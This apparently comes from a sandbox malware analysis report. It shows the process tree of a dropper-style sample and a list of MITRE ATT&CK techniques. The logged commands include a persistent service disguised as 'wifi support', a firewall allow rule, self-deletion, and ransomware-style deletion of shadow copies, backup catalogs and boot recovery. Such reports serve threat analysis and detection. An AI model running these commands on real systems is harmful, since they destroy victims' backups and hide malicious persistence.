  "C:\Users\Admin\Documents\YZxK0OWqHiSObreIaOg4z4f4.exe"
  2⤵
  - Executes dropped EXE
  PID:1412
- - C:\Users\Admin\Documents\YZxK0OWqHiSObreIaOg4z4f4.exe
    "C:\Users\Admin\Documents\YZxK0OWqHiSObreIaOg4z4f4.exe"
    3⤵
    PID:7124
- C:\Users\Admin\Documents\_G4rLDF19KZ5ZhGv7ZdSIDyo.exe
  "C:\Users\Admin\Documents\_G4rLDF19KZ5ZhGv7ZdSIDyo.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:496
- C:\Users\Admin\Documents\t6AcSDTFlNB7NpFSSB79XgDO.exe
  "C:\Users\Admin\Documents\t6AcSDTFlNB7NpFSSB79XgDO.exe"
  2⤵
  - Executes dropped EXE
  PID:4260
- C:\Users\Admin\Documents\wri46SBAjpYCwM2mkBxsQiUc.exe
  "C:\Users\Admin\Documents\wri46SBAjpYCwM2mkBxsQiUc.exe"
  2⤵
  - Executes dropped EXE
  PID:2124

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4536
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  PID:4492
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 268
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4252

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
PID:5912
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5848

C:\Windows\system32\WerFault.exe
"C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20210827-1626.dm
1⤵
PID:13872

C:\Users\Admin\AppData\Roaming\afgfbwi
C:\Users\Admin\AppData\Roaming\afgfbwi
1⤵
PID:14200
- C:\Users\Admin\AppData\Roaming\afgfbwi
  C:\Users\Admin\AppData\Roaming\afgfbwi
  2⤵
  PID:2980

C:\Users\Admin\AppData\Local\Temp\9B11.exe
C:\Users\Admin\AppData\Local\Temp\9B11.exe
1⤵
PID:13912
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\prdaowrm\
  2⤵
  PID:14580
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qktdqtyk.exe" C:\Windows\SysWOW64\prdaowrm\
  2⤵
  PID:14504
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create prdaowrm binPath= "C:\Windows\SysWOW64\prdaowrm\qktdqtyk.exe /d\"C:\Users\Admin\AppData\Local\Temp\9B11.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:14692
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description prdaowrm "wifi internet conection"
  2⤵
  PID:14772
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start prdaowrm
  2⤵
  PID:15096
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:15224
- C:\Users\Admin\jqcpylmg.exe
  "C:\Users\Admin\jqcpylmg.exe" /d"C:\Users\Admin\AppData\Local\Temp\9B11.exe"
  2⤵
  PID:15268
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jzzzofld.exe" C:\Windows\SysWOW64\prdaowrm\
    3⤵
    PID:6608
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" config prdaowrm binPath= "C:\Windows\SysWOW64\prdaowrm\jzzzofld.exe /d\"C:\Users\Admin\jqcpylmg.exe\""
    3⤵
    PID:15700
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" start prdaowrm
    3⤵
    PID:15916
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
    3⤵
    PID:15232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1664.bat" "
    3⤵
    PID:15980

C:\Users\Admin\AppData\Local\Temp\CD7C.exe
C:\Users\Admin\AppData\Local\Temp\CD7C.exe
1⤵
PID:14992
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\CD7C.exe"
  2⤵
  PID:11672
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:15280

C:\Users\Admin\AppData\Local\Temp\E7DB.exe
C:\Users\Admin\AppData\Local\Temp\E7DB.exe
1⤵
PID:14412
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe
  2⤵
  PID:15280
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe" -start
  2⤵
  PID:15276
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe" -agent 0
    3⤵
    PID:4396
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
    3⤵
    PID:7020
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:17940
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    3⤵
    PID:4728
  - - C:\Windows\SysWOW64\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:17188
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    PID:11012
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:6816
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    PID:4300
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    3⤵
    PID:8100
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:17088

C:\Users\Admin\AppData\Local\Temp\E953.exe
C:\Users\Admin\AppData\Local\Temp\E953.exe
1⤵
PID:14960
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"
  2⤵
  PID:13292

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:14756

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:15124

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:14372

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:14664

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:13512

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:14588

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:15456

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:15604

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:15708

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:16780

C:\Users\Admin\AppData\Roaming\afgfbwi
C:\Users\Admin\AppData\Roaming\afgfbwi
1⤵
PID:25752

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

New Service

T1050

Scheduled Task

Privilege Escalation

New Service

T1050

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery